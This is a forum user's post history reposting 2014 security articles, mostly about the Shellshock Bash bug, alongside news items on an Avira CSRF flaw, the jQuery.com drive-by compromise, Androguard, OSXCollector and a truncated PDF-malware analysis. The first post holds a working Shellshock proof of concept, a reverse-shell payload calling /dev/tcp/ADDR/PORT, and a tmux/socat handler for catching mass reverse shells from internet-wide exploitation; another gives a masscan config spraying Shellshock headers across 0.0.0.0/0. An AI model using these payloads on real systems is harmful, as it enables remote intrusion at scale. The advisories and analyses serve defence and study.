Jump to content

Nytro

Administrators
  • Posts

    18787
  • Joined

  • Last visited

  • Days Won

    738

Everything posted by Nytro

  1. CVE-2014-6271 / Shellshock & How to handle all the shells! Posted by Joel Eriksson ? 2014-09-25 ? Leave a Comment For the TL;DR generation: If you just want to know how to handle all the shells, search for “handling all the shells” and skip down to that. CVE-2014-6271, also known as “Shellshock”, is quite a neat little vulnerability in Bash. It relies on a feature in Bash that allows child processes to inherit shell functions that were defined in the parent. I have played around with this feauture before, many years ago, since it could be abused in another way in cases where SUID-programs execute external shell scripts (or use system()/popen(), when /bin/bash is the default system shell) and with certain daemons that support environment variable passing. When a SUID-program is the target, the SUID-program must first do something like setuid(geteuid()) for this to be exploitable, since inherited shell functions are not accepted when the UID differs from the EUID. When SUID-programs call out to shellscript helpers (that need to be executed with elevated privileges) this is usually done, since most shells automatically drop privileges when starting up. In those cases, it was possible to trick Bash into executing a malicious shell function even when PATH is set explicitly to a “safe” value, or even when the full path is used for all calls to external programs. This was possible due to Bash happily accepting slashes within shell function names. This example demonstrates this problem, as well as the new (and much more serious) CVE-2014-6271 vulnerability. je@tiny:~$ cat > bash-is-fun.c /* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */ #include <unistd.h> #include <stdio.h> int main() { char *envp[] = { "PATH=/bin:/usr/bin", "/usr/bin/id=() { " "echo pwn me twice, shame on me; }; " "echo pwn me once, shame on you", NULL }; char *argv[] = { "/bin/bash", NULL }; execve(argv[0], argv, envp); perror("execve"); return 1; } ^D je@tiny:~$ gcc -o bash-is-fun bash-is-fun.c je@tiny:~$ ./bash-is-fun pwn me once, shame on you je@tiny:/home/je$ /usr/bin/id pwn me twice, shame on me As you can see, the environment variable named “/usr/bin/id” is set to “() { cmd1; }; cmd2?. Due to the CVE-2014-6271 vulnerability, any command that is provided as “cmd2? will be immediately executed when Bash starts. Due to the peculiarity I was already familiar with, the “cmd1? part is executed when trying to run id in a “secure” manner by providing the full path. One of the possibilities that crossed my mind when I got to know about this vulnerability was to exploit this over the web, due to CGI programs using environment variables to pass various information that can be arbitrarily controlled by an attacker. For instance, the user-agent string, is normally passed in the HTTP_USER_AGENT environment variable. It turns out I was not alone in thinking about this though, and shortly after information about the “Shellshock” vulnerability was released, Robert Graham at Errata Security started scanning the entire internet for vulnerable web servers. Turns out there are quite a few of them. The scan is quite limited in the sense that it only discovers cases where the default page (GET /) of the default virtual host is vulnerable, and it only uses the Host-, Referer- and Cookie-headers. Another convenient header to use is the User-Agent one, that is normally passed in the HTTP_USER_AGENT variable. Another way to find lots and lots of potentially vulnerable targets is to do a simple google search for “inurl:cgi-bin filetype:sh” (without the quotes). As you may have realized by now, the impact of this vulnerability is enormous. So, now to the part of handling all the shells. Let’s say you are testing a large subnet (or the entire internet) for this vulnerability, and don’t want to settle with a ping -c N ADDR-payload, as the one Robert Graham used in his PoC. A simple netcat listener is obviously no good, since that will only be useful to deal with a single reverse shell. My solution gives you as many shells as the amount of windows tmux can handle (a lot). Let’s assume you want a full reverse-shell payload, and let’s also assume that you want a full shell with job-control and a pty instead of the less convenient one you usually get under these circumstances. Assuming a Python interpreter is installed on the target, which is usually a pretty safe bet nowadays, I would suggest you to use a payload such as this (with ADDR and PORT replaced with your IP and port number, of course): () { :; }; bash -c 'python -c "import pty; pty.spawn(\"/bin/bash\")" <> /dev/tcp/ADDR/PORT >&0 2>&0' To try this out, just run this in one shell to start a listener: stty -echo raw; nc -l 12345; stty sane Then do this in another shell: bash -c 'python -c "import pty; pty.spawn(\"/bin/bash\")" <> /dev/tcp/127.0.0.1/12345 >&0 2>&0' To deal with all the shells coming your way I would suggest you to use some tmux+socat-magic I came up with when dealing with similar “problems” in the past. Place the code below in a file named “alltheshells-handler” and make it executable (chmod 700): #!/bin/sh tmux has-session -t alltheshells 2>/dev/null \ || tmux new-session -d -s alltheshells "cat>/dev/null" \; rename-window info tmux send-keys -t alltheshells:info "$(date '+%Y-%m-%d %H:%M:%S') Received a shell from $SOCAT_PEERADDR" Enter mkdir /tmp/alltheshells 2>/dev/null tmux new-window -d -t alltheshells -n "$SOCAT_PEERADDR" \ "sleep 1; stty -echo raw; socat unix-client:/tmp/alltheshells/$$.sock -; stty sane; echo; echo EOF; read" socat unix-listen:/tmp/alltheshells/$$.sock - Execute this command to start the listener handling all your shells (replace PORT with the port number you want to listen to): socat tcp-l:PORT,reuseaddr,fork exec:./alltheshells-handler When the shells start popping you can do: tmux attach -t alltheshells The tmux session will not be created until at least one reverse shell has arrived, so if you’re impatient just connect to the listener manually to get it going. If you want to try this with my personal spiced-up tmux configuration, download this: ########################### # Initialization ########################### # - Pastebin.com Switch between windows (shells) by simply using ALT-n / ALT-p for the next/previous one. Note that I use ALT-e as my meta-key instead of CTRL-B, since I use CTRL-B for other purposes. Feel free to change this to whatever you are comfortable with. Sursa: CVE-2014-6271 / Shellshock & How to handle all the shells! | ClevCode
  2. [h=3]Bash 'shellshock' scan of the Internet[/h] By Robert Graham I'm running a scan right now of the Internet to test for the recent bash vulnerability, to see how widespread this is. My scan works by stuffing a bunch of "ping home" commands in various CGI variables. It's coming from IP address 209.126.230.72. The configuration file for masscan looks something like: target = 0.0.0.0/0 port = 80 banners = true http-user-agent = shellshock-scan (Errata Security: Bash 'shellshock' scan of the Internet) http-header[Cookie] = () { :; }; ping -c 3 209.126.230.74 http-header[Host] = () { :; }; ping -c 3 209.126.230.74 http-header[Referer] = () { :; }; ping -c 3 209.126.230.74 (Actually, these last three options don't quite work due to bug, so you have to manually add them to the code https://github.com/robertdavidgraham/masscan/blob/master/src/proto-http.c#L120) Some earlier shows that this bug is widespread: A discussion of the results is at the next blogpost here. The upshot is this: while this scan found only a few thousand systems (because it's intentionally limited), it looks like the potential for a worm is high. Sursa: Errata Security: Bash 'shellshock' scan of the Internet
  3. We spent a good chunk of the day investigating the now-famous bash bug, so I had no time for too many jokes about it on Twitter - but I wanted to jot down several things that have been getting drowned out in the noise earlier in the day. Let's start with the nature of the bug. At its core, the problem caused by an obscure and little-known feature that allows bash programs to export function definitions from a parent shell to children shells, similarly to how you can export normal environmental variables. The functionality in action looks like this: $ function foo { echo "hi mom"; } $ export -f foo $ bash -c 'foo' # Spawn nested shell, call 'foo' hi mom The behavior is implemented as a hack involving specially-formatted environmental variables: in essence, any variable starting with a literal "() {" will be dispatched to the parser just before executing the main program. You can see this in action here: $ foo='() { echo "hi mom"; }' bash -c 'foo' hi mom The concept of giving magical properties to certain values of environmental variables clashes with several ancient customs - most notably, with the tendency for web servers such as Apache to pass client-supplied strings in the environment to any subordinate binaries or scripts. Say, if I request a CGI or PHP script from your server, the env variables $HTTP_COOKIE and $HTTP_USER_AGENT will be probably initialized to the raw values seen in the original request. If the values happen to begin with "() {" and are ever seen by /bin/bash, events may end up taking an unusual turn. And so, the bug we're dealing with stems from the observation that trying to parse function-like strings received in HTTP_* variables could have some unintended side effects in that shell - namely, it could easily lead to your server executing arbitrary commands trivially supplied in a HTTP header by random people on the Internet. With that out of the way, it is important to note that the today's patch provided by the maintainer of bash does not stop the shell from trying to parse the code within headers that begin with "() {" - it merely tries to get rid of that particular RCE side effect, originally triggered by appending commands past the end of the actual function def. But even with all the current patches applied, you can still do this: Cookie: () { echo "Hello world"; } ...and witness a callable function dubbed HTTP_COOKIE() materialize in the context of subshells spawned by Apache; of course, the name will be always prefixed with HTTP_*, so it's unlikely to clash with anything or be called by incident - but intuitively, it's a pretty scary outcome. In the same vein, doing this will also have an unexpected result: Cookie: () { oops If specified on a request to a bash-based CGI script, you will see a scary bash syntax error message in your error log. All in all, the fix hinges on two risky assumptions: That the bash function parser invoked to deal with variable-originating function definitions is robust and does not suffer from the usual range of low-level C string parsing bugs that almost always haunt similar code - a topic that hasn't been studied in much detail until now. That the parsing steps are guaranteed to have no global side effects within the child shell. As it happens, this assertion has been already proved wrong by Tavis; the side effect he found probably-maybe isn't devastating in the general use case (at least until the next stroke of brilliance), but it's certainly a good reason for concern. If I were a betting man, I would not bet on the fix holding up in the long haul. A more reasonable solution would involve temporarily disabling function exports or blacklisting some of the most dangerous variable patterns (e.g., HTTP_*); and later on, perhaps moving to a model where function exports use a distinct namespace while present in the environment. What else? Oh, of course: the impact of this bug is an interesting story all in itself. At first sight, the potential for remote exploitation should be limited to CGI scripts that start with #!/bin/bash and to several other programs that explicitly request this particular shell. But there's a catch: on a good majority of modern Linux systems, /bin/sh is actually a symlink to /bin/bash! This means that web apps written in languages such as PHP, Python, C++, or Java, are likely to be vulnerable if they ever use libcalls such as popen() or system(), all of which are backed by calls to /bin/sh -c '...'. There is also some added web-level exposure through #!/bin/sh CGI scripts, <!--#exec cmd="..."> calls in SSI, and possibly more exotic vectors such as mod_ext_filter. For the same reason, userland DHCP clients that invoke configuration scripts and use variables to pass down config details are at risk when exposed to rogue servers (e.g., on open wifi). Finally, there is some exposure for environments that use restricted SSH shells (possibly including Git) or restricted sudo commands, but the security of such approaches is typically fairly modest to begin with. Exposure on other fronts is possible, but probably won't be as severe. The worries around PHP and other web scripting languages, along with the concern for userspace DHCP, are the most significant reasons to upgrade - and perhaps to roll out more paranoid patches, rather than relying solely on the two official ones. On the upside, you don't have to worry about non-bash shells - and that covers a good chunk of embedded systems of all sorts. PS. As for the inevitable "why hasn't this been noticed for 15 years" / "I bet the NSA knew about it" stuff - my take is that it's a very unusual bug in a very obscure feature of a program that researchers don't really look at, precisely because no reasonable person would expect it to fail this way. So, life goes on. Sursa: lcamtuf's blog: Quick notes about the bash bug, its impact, and the fixes so far
  4. Bash specially-crafted environment variables code injection attack Posted on 2014/09/24 by Huzaifa Sidhpurwala Bash or the Bourne again shell, is a UNIX like shell, which is perhaps one of the most installed utilities on any Linux system. From its creation in 1980, bash has evolved from a simple terminal based command interpreter to many other fancy uses. In Linux, environment variables provide a way to influence the behavior of software on the system. They typically consists of a name which has a value assigned to it. The same is true of the bash shell. It is common for a lot of programs to run bash shell in the background. It is often used to provide a shell to a remote user (via ssh, telnet, for example), provide a parser for CGI scripts (Apache, etc) or even provide limited command execution support (git, etc) Coming back to the topic, the vulnerability arises from the fact that you can create environment variables with specially-crafted values before calling the bash shell. These variables can contain code, which gets executed as soon as the shell is invoked. The name of these crafted variables does not matter, only their contents. As a result, this vulnerability is exposed in many contexts, for example: ForceCommand is used in sshd configs to provide limited command execution capabilities for remote users. This flaw can be used to bypass that and provide arbitrary command execution. Some Git and Subversion deployments use such restricted shells. Regular use of OpenSSH is not affected because users already have shell access. Apache server using mod_cgi or mod_cgid are affected if CGI scripts are either written in bash, or spawn subshells. Such subshells are implicitly used by system/popen in C, by os.system/os.popen in Python, system/exec in PHP (when run in CGI mode), and open/system in Perl if a shell is used (which depends on the command string). PHP scripts executed with mod_php are not affected even if they spawn subshells. DHCP clients invoke shell scripts to configure the system, with values taken from a potentially malicious server. This would allow arbitrary commands to be run, typically as root, on the DHCP client machine. Various daemons and SUID/privileged programs may execute shell scripts with environment variable values set / influenced by the user, which would allow for arbitrary commands to be run. Any other application which is hooked onto a shell or runs a shell script as using bash as the interpreter. Shell scripts which do not export variables are not vulnerable to this issue, even if they process untrusted content and store it in (unexported) shell variables and open subshells. Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables. This flaw is triggered when extra code is added to the end of these function definitions (inside the enivronment variable). Something like: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test The patch used to fix this flaw, ensures that no code is allowed after the end of a bash function. So if you run the above example with the patched version of bash, you should get an output similar to: $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" bash: warning: x: ignoring function definition attempt bash: error importing function definition for `x' this is a test We believe this should not affect any backward compatibility. This would, of course, affect any scripts which try to use environment variables created in the way as described above, but doing so should be considered a bad programming practice. Red Hat has issued security advisories that fixes this issue for Red Hat Enterprise Linux. Fedora has also shipped packages that fixes this issue. We have additional information regarding specific Red Hat products affected by this issue that can be found at https://access.redhat.com/site/solutions/1207723 Information on CentOS can be found at [CentOS] Critical update for bash released today.. Sursa: https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
  5. Bash-ing Into Your Network – Investigating CVE-2014-6271 Posted by Jen Ellis in Information Security on Sep 25, 2014 3:34:35 AM By now, you may have heard about CVE-2014-6271, also known as the "bash bug", or even "Shell Shock", depending on where you get your news. This vulnerability was discovered by Stephane Chazelas of Akamai and is potentially a big deal. It’s rated the maximum CVSS score of 10 for impact and ease of exploitability. The affected software, Bash (the Bourne Again SHell), is present on most Linux, BSD, and Unix-like systems, including Mac OS X. New packages were released today, but further investigation made it clear that the patched version may still be exploitable, and at the very least can be crashed due to a null pointer exception. The incomplete fix is being tracked as CVE-2014-7169. Should I panic? The vulnerability looks pretty awful at first glance, but most systems with Bash installed will NOT be remotely exploitable as a result of this issue. In order to exploit this flaw, an attacker would need the ability to send a malicious environment variable to a program interacting with the network and this program would have to be implemented in Bash, or spawn a sub-command using Bash. The Red Hat blog post goes into detail on the conditions required for a remote attack. The most commonly exposed vector is likely going to be legacy web applications that use the standard CGI implementation. On multi-user systems, setuid applications that spawn "safe" commands on behalf of the user may also be subverted using this flaw. Successful exploitation of this vulnerability would allow an attacker to execute arbitrary system commands at a privilege level equivalent to the affected process. What is vulnerable? This attack revolves around Bash itself, and not a particular application, so the paths to exploitation are complex and varied. So far, the Metasploit team has been focusing on the web-based vectors since those seem to be the most likely avenues of attack. Standard CGI applications accept a number of parameters from the user, including the browser's user agent string, and store these in the process environment before executing the application. A CGI application that is written in Bash or calls system() or popen() is likely to be vulnerable, assuming that the default shell is Bash. Secure Shell (SSH) will also happily pass arbitrary environment variables to Bash, but this vector is only relevant when the attacker has valid SSH credentials, but is restricted to a limited environment or a specific command. The SSH vector is likely to affect source code management systems and the administrative command-line consoles of various network appliances (virtual or otherwise). There are likely many other vectors (DHCP client scripts, etc), but they will depend on whether the default shell is Bash or an alternative such as Dash, Zsh, Ash, or Busybox, which are not affected by this issue. Modern web frameworks are generally not going to be affected. Simpler web interfaces, like those you find on routers, switches, industrial control systems, and other network devices are unlikely to be affected either, as they either run proprietary operating systems, or they use Busybox or Ash as their default shell in order to conserve memory. A quick review of a approximately 50 firmware images from a variety of enterprise, industrial, and consumer devices turned up no instances where Bash was included in the filesystem. By contrast, a cursory review of a handful of virtual appliances had a 100% hit rate, but the web applications were not vulnerable due to how the web server was configured. As a counter-point, Digital Bond believes that quite a few ICS and SCADA systems include the vulnerable version of Bash, as outlined in their blog post. Robert Graham of Errata Security believes there is potential for a worm after he identified a few thousand vulnerable systems using Masscan. The esteemed Michal Zalewski also weighed in on the potential impact of this issue. In summary, there just isn't enough information available to predict how many systems are potentially exploitable today. The two most likely situations where this vulnerability will be exploited in the wild: Diagnostic CGI scripts that are written in Bash or call out to system() where Bash is the default shell PHP applications running in CGI mode that call out to system() and where Bash is the default shell Bottom line: This bug is going to affect an unknowable number of products and systems, but the conditions to exploit it are fairly uncommon for remote exploitation. Is it as bad as Heartbleed? There has been a great deal of debate on this in the community, and we’re not keen to jump on the “Heartbleed 2.0” bandwagon. The conclusion we reached is that some factors are worse, but the overall picture is less dire. This vulnerability enables attackers to not just steal confidential information as with Heartbleed, but also to take over the device or system and execute code remotely. From what we can tell, the vulnerability is most likely to affect a lot of systems, but it isn't clear which ones, or how difficult those systems will be to patch. The vulnerability is also incredibly easy to exploit. Put that together and you are looking at a lot of confusion and the potential for large-scale attacks. BUT – and that’s a big but – per the above, there are a number of factors that need to be in play for a target to be susceptible to attack. Every affected application may be exploitable through a slightly different vector or have different requirements to reach the vulnerable code. This may significantly limit how widespread attacks will be in the wild. Heartbleed was much easier to conclusively test and the impact way more widespread. How can you protect yourself? The most straightforward answer is to deploy the patches that have been released as soon as possible. Even though CVE-2014-6271 is not a complete fix, the patched packages are more complicated to exploit. We expect to see new packages arrive to address CVE-2014-7169 in the near future. If you have systems that cannot be patched (for example systems that are End-of-Life), it’s critical that they are protected behind a firewall. A big one. And test whether that firewall is secure. What can we do to help? Rapid7's Nexpose and Metasploit products have been updated to assist with the detection and verification of these issues. Nexpose has been updated to check for CVE-2014-6271 via credentialed scans and will be updated again soon to cover the new packages released for CVE-2014-7169. Metasploit added a module to the framework a few hours ago and it will become available in both Metasploit Community and Metasploit Pro in our weekly update. We strongly recommend that you test your systems as soon as possible and deploy any necessary mitigations. If you would like some advice on how to handle this situation, our Services team can help. Are Rapid7’s solutions affected? Based on our current investigation, we are confident that our solutions are not impacted by this vulnerability in any way that could affect our customers and users. If we become aware of any further possibilities for exploitation, we’ll update this blog to keep you informed. Sursa: https://community.rapid7.com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271
  6. [h=1]Scorpion Brings the Stupidest, Most Batshit Insane Hacker Scene Ever[/h] So Scorpion debuted last night on CBS, bringing us the thrilling tale of "geniuses" who help DHS by setting up wifi access points in restaurants. Yes, that is a true plot point. It all leads to this scene, whose true meaning I will unfold for you so that you can appreciate the full amazing awfulness. https://www.youtube.com/watch?v=igxrvISaY4E All you need to know about the main character is that he's a genius who is "on software," which means he tells people things like "open your email and click the link." He has trouble communicating his emotions because he's a geek who only understands machines, and he has a dusty warehouse space that's shared by a tough hardware expert, a hat-wearing psychology master, and a nerdy "human calculator." This week, the DHS brings him an emergency! There is a bug in the local airport's software and now 200 planes are going to crash if he doesn't do something! So he decides that the best thing to do is reboot from a backup version (yes that is the ACTUAL SUPER ELITE HIGH TECH THING HE'S DOING). But where is the backup? Ohhhh, it turns out EVERY PLANE has it, and if only they could download it from one of the planes, everybody could land and nobody would crash. The only way to get that backup, though, is USING AN ETHERNET CABLE DANGLED OUT OF THE BOTTOM OF THE PLANE AND PLUGGED INTO HIS LAPTOP. Oh I know, I know — you think that's ridiculous, right? But it's not! Because they ALREADY TRIED A WIFI CONNECTION and it didn't work. So obviously the next thing is the ethernet cable. Also, the best way to do all this is to fly the plane low over the car that is racing ON THE LANDING STRIP. No, don't LAND THE DAMN PLANE on said strip and then reboot from the plane's backup (note that I am not even getting into the sheer dumbfoundery of the notion that the planes all have a backup of the software, or that the entire airport is run on "a piece of software," or that you can't land without software EVEN THOUGH WE ACTUALLY INVENTED PLANES BEFORE WE INVENTED COMPUTERS). Oh and also? At one point, we see that all the computers are running VMware. Which — did VMware pay for product placement? Did Scorpion hire somebody with a job title like "cybersecurity ninja" from VMware to advise them? We may never know. So anyway the guy gets some random chick from the diner where he installed some wifi to drive with him in his car and hook up the ethernet cable and save the airport. Yay! Airport rebooted! Hacker triumph! Next week, the geniuses will help a guy whose pants keep falling down. I apologize for all the caps but I had a lot of feels. Sursa: Scorpion Brings the Stupidest, Most Batshit Insane Hacker Scene Ever
  7. Google's latest object recognition tech can spot everything in your living room by Jon Fingas | @jonfingas | September 8th 2014 at 4:38 am Automatic object recognition in images is currently tricky. Even if a computer has the help of smart algorithms and human assistants, it may not catch everything in a given scene. Google might change that soon, though; it just detailed a new detection system that can easily spot lots of objects in a scene, even if they're partly obscured. The key is a neural network that can rapidly refine the criteria it's looking for without requiring a lot of extra computing power. The result is a far deeper scanning system that can both identify more objects and make better guesses -- it can spot tons of items in a living room, including (according to Google's odd example) a flying cat. The technology is still young, but the internet giant sees its recognition breakthrough helping everything from image searches through to self-driving cars. Don't be surprised if it gets much easier to look for things online using only vaguest of terms. Sursa: Google's latest object recognition tech can spot everything in your living room
  8. Creste numarul de posturi, continut nou pe Google, SEO. Astfel, cand vor cauta oamenii pe Google "salut", vor ajunge pe RST si vor invata cum se saluta.
  9. Un fix rapid e deja disponibil. apt-get update/yum update si ce mai vreti voi.
  10. ########################################################################## ################################# Androguard ############################# ########################################################################## ################### http://code.google.com/p/androguard ################## ######################## dev (at) androguard.re ########################## ########################################################################## 1 -] About Androguard (Android Guard) is primarily a tool written in full python to play with : - DEX, ODEX - APK - Android's binary xml 2 -] Usage You need to follow the following information to install dependencies for androguard : Installation - androguard - How to install Androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting You must go to the website to see more example : Usage - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.1 --] API 2.1.1 --] Instructions http://code.google.com/p/androguard/wiki/Instructions 2.2 --] Demos see the source codes in the directory 'demos' 2.3 --] Tools Usage - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.4 --] Disassembler http://code.google.com/p/androguard/wiki/Disassembler 2.5 --] Analysis http://code.google.com/p/androguard/wiki/Analysis 2.6 --] Visualization Visualization - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.7 --] Similarities, Diffing, plagiarism/rip-off indicator http://code.google.com/p/androguard/wiki/Similarity http://code.google.com/p/androguard/wiki/DetectingApplications 2.8 --] Open Source database of android malwares DatabaseAndroidMalwares - androguard - Open Source database of android malware (links + signatures) - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 2.9 --] Decompiler 2.10 --] Reverse RE - androguard - Reverse Engineering Tutorial of Android Apps - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 3 -] Roadmap/Issues RoadMap - androguard - Features and roadmap - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting Issues - androguard - Reverse engineering, Malware and goodware analysis of Android applications ... and more (ninja !) - Google Project Hosting 4 -] Authors: Androguard Team Androguard + tools: Anthony Desnos <desnos at t0t0.fr> DAD (DAD is A Decompiler): Geoffroy Gueguen <geoffroy dot gueguen at gmail dot com> 5 -] Contributors Craig Smith <agent dot craig at gmail dot com>: 64 bits patch + magic tricks 6 -] Licenses 6.1 --] Androguard Copyright © 2012, Anthony Desnos <desnos at t0t0.fr> All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS-IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. 6.2 -] DAD Copyright © 2012, Geoffroy Gueguen <geoffroy.gueguen@gmail.com> All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS-IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Sursa: https://github.com/androguard/androguard
  11. Avira – Critical CSRF flaw Vulnerability puts millions users at risk by Pierluigi Paganini on September 20th, 2014 Egyptian bug hunter discovered that Avira Website is affected by CSRF flaw that allows attackers to hijack users’ accounts and access to their online backup. What do you think about if tell you that an antivirus could represent a menace for your system? Antivirus like any other kind of software could be exploited by threat actors to compromise the machine as already explained my previous post. The popular antivirus software Avira that includes a Secure Backup service is vulnerable to a critical web application vulnerability that could allow an attacker to take over the user’s account. The Egyptian 16 year-old expert Mazen Gamal reported to The Hacker News that the Avira Website is affected by a CSRF (Cross-site request forgery) vulnerability that allows an attacker to hijack users’ accounts and access to their online secure cloud backup files. The CSRF vulnerability potentially puts millions of Avira users’ account at risk. CSRF allows an end user to execute unwanted actions on a web application once he is authenticated, in a typical attack scheme attacker sends a link via email or through a social media platform, or share a specially crafted HTML exploit page to trick the victim into executing actions of the attacker’s choosing. In this specific case an attacker could use CSRF exploit to trick a victim into accessing a malicious link that contains requests which will replace victim’s email ID on Avira account with attacker’s email ID. This this CSRF attack the victim’s account could be easily compromised, by replacing the email address the attacker can easily reset the password of the victim’s account running the forget password procedure, bacause Avira will send the password reset link to attacker’s email ID instead of the victim’s ID. Once gained the access to the victim’s account the attacker would be able to retrieve its online backup, which include files the user has stored on the Online backup Software (https://dav.backup.avira.com/). “I found a CSRF vulnerability in Avira can lead me to full account takeover of any Avira user account,” Gamal said via an email to The Hacker News. “The impact of the account takeover allowed me to Open the Backup files of the victim and also view the license codes for the affected user.” Gamal also provided a Proof-of-Concept video to demonstrate its discovery. Gamal has reported the vulnerability to the Avira Security Team on August 21th, the team admitted the flaw and fixed the CSRF bug on their website, but the Secure online backup service “is still vulnerable to hackers until Avira will not offer a offline password layer for decrypting files locally.” Mazen Gamal has been recognized as an official bug hunter by Avira. Pierluigi Paganini (Security Affairs – AVIRA, CSRF) Sursa: Avira - Critical CSRF flaw Vulnerability puts millions users at risk | Security Affairs
  12. Official jQuery Website Abused in Drive-by Download Attack By Eduard Kovacs on September 23, 2014 The official website for the popular JavaScript library jQuery (jquery.com) has been compromised and abused by cybercriminals to distribute information-stealing malware, RiskIQ has reported. Roughly 70 percent of the world's top 10,000 websites rely on jQuery for dynamic content, and because most jQuery users are website and systems administrators who maintain elevated privileges within their networks, it's possible that this attack is part of an operation whose goal is to compromise the systems of major organizations, RiskIQ said. "Typically, these individuals have privileged access to web properties, backend systems and other critical infrastructure. Planting malware capable of stealing credentials on devices owned by privilege accounts holders inside companies could allow attackers to silently compromise enterprise systems, similar to what happened in the infamous Target breach," James Pleger, RiskIQ Director of Research, explained in a blog post. According to the security firm, the jQuery library itself doesn't appear to be affected by the attack. However, the attackers planted an invisible iframe on the jQuery website to redirect its visitors to another site hosting the RIG exploit kit. The RIG exploit kit was recently seen in several malvertising campaigns. The exploit kit is often used to deliver banking Trojans and other information-stealing malware. Last week, Avast researchers reported spotting a RIG attack in which the Tinba banking malware was the payload. After consulting with researchers at Dell, RiskIQ determined that the malware being served in this particular attack is Andromeda, Pleger told SecurityWeek. While RIG includes exploits for several vulnerabilities, Pleger said they directly observed Microsoft Silverlight exploits being used. The redirector domain utilized in the attack (jquery-cdn[.]com) is hosted in Russia and it was registered on September 18, the day on which the attack started. Fortunately, the administrators of jQuery.com removed the malicious code, but the redirector domain is still online as of September 23. The attack affected companies in various sectors, including banking, technology and defense, Pleger said via email. While RiskIQ hasn't been able to track down all the victims of this campaign, the security firm has notified all the companies it has identified as being attacked. Sursa: Official jQuery Website Abused in Drive-by Download Attack | SecurityWeek.Com
  13. How'd that malware get there? That's the question you've got to answer for every OSX malware infection. We built OSXCollector to make that easy. Quickly parse its output to get an answer. A typical infection might follow a path like: a phishing email leads to a malicious download once installed, the initial establishes persistence then it reaches out on the network and pulls down additional payloads With the output of OSXCollector we quickly correlate between browser history, startup items, downloads, and installed applications. It makes root causing an infection, collect IOCs, and get to the bottom of an infection. So what does it do? OSXCollector gathers information from plists, sqlite databases and the local filesystems to get the information for analyzing a malware infection. The output is JSON which makes it easy to process it further by other tools. Usage Tool is self contained in one script file osxcollector. Launch OSXCollector as root or it will be unable to read data from all accounts $ sudo ./osxcollector.py Before running the tool make sure that your web browsers (Safari, Chrome or Firefox) are closed. Otherwise OS X Collector will not be able to access their diagnostic files for collecting the data. Sursa: https://github.com/Yelp/osxcollector
  14. Malicious Documents – PDF Analysis in 5 steps Mass mailing or targeted campaigns that use common files to host or exploit code have been and are a very popular vector of attack. In other words, a malicious PDF or MS Office document received via e-mail or opened trough a browser plug-in. In regards to malicious PDF files the security industry saw a significant increase of vulnerabilities after the second half of 2008 which might be related to Adobe Systems release of the specifications, format structure and functionality of PDF files. Most enterprise networks perimeters are protected and contain several security filters and mechanism that block threats. However a malicious PDF or MS Office document might be very successful passing trough Firewalls, Intrusion Prevention Systems, Anti-spam, Anti-virus and other security controls. By reaching the victim mailbox, this attack vector will leverage social engineering techniques to lure the user to click/open the document. Then, for example, If the user opens a PDF malicious file, it typically executes JavaScript that exploits a vulnerability when Adobe Reader parses the crafted file. This might cause the application to corrupt memory on the stack or heap causing it to run arbitrary code known as shellcode. This shellcode normally downloads and executes a malicious file from the Internet. The Internet Storm Center Handler Bojan Zdrnja wrote a good summary about one of these shellcodes. In some circumstances the vulnerability could be exploited without opening the file and just by having a malicious file on the hard drive as described by Didier Stevens. From a 100 feet view a PDF file is composed by a header , body, reference table and trailer. One key component is the body which might contains all kinds of content type objects that make parsing attractive for vulnerability researchers and exploit developers. The language is very rich and complex which means the same information can be encoded and obfuscated in many ways. For example within objects there are streams that can be used to store data of any type of size. These streams are compressed and the PDF standard supports several algorithms including ASCIIHexDecode, ASCI85Decode, LZWDecode, FlateDecode, RunLengthDecode, CCITTFaxDecode, DCTCDecode called Filters. PDF files can contain multimedia content and support JavaScript and ActionScript trough Flash objects. Usage of JavaScript is a popular vector of attack because it can be hidden in the streams using different techniques making detection harder. In case the PDF file contains JavaScript, the malicious code is used to trigger a vulnerability and to execute shellcode. All this features and capabilities are translated in a huge attack surface! From a security incident response perspective the knowledge about how to do a detailed analysis of such malicious files can be quite useful. When analyzing this kind of files an incident handler can determine the worst it can do, its capabilities and key characteristics. Furthermore it can help to be better prepared and identify future security incidents and how to contain, eradicate and recover from those threats. So which steps could an incident handler or malware analyst perform to analyze such files. In case of malicious PDF files there are 5 steps. By using REMnux distro the steps are described by Lenny Zeltser as being: Find and Extract Javascript Deobfuscate Javascript Extract the shellcode Create a shellcode executable Analyze shellcode and determine what is does. A summary of tools and techniques using REMnux to analyze malicious documents are described in the cheat sheet compiled by Lenny, Didier and others. In order to practice these skills and illustrate an introduction to the tools and techniques below is the analysis of a malicious PDF using these steps. The other day I received one of those emails that was part of a mass mailing campaign. The email contained an attachment with a malicious PDF file that took advantage of Adobe Reader Javascript engine to exploit CVE-2013-2729. This vulnerability found by Felipe Manzano exploits an integer overflow in several versions of the Adobe Reader when parsing BMP files compressed with RLE8 encoded in PDF forms. The file on Virus Total was only detected by 6 of the 55 AV engines. Let’s go through each one of the mentioned steps to find information on the malicious PDF key characteristics and its capabilities. 1st Step – Find and extract 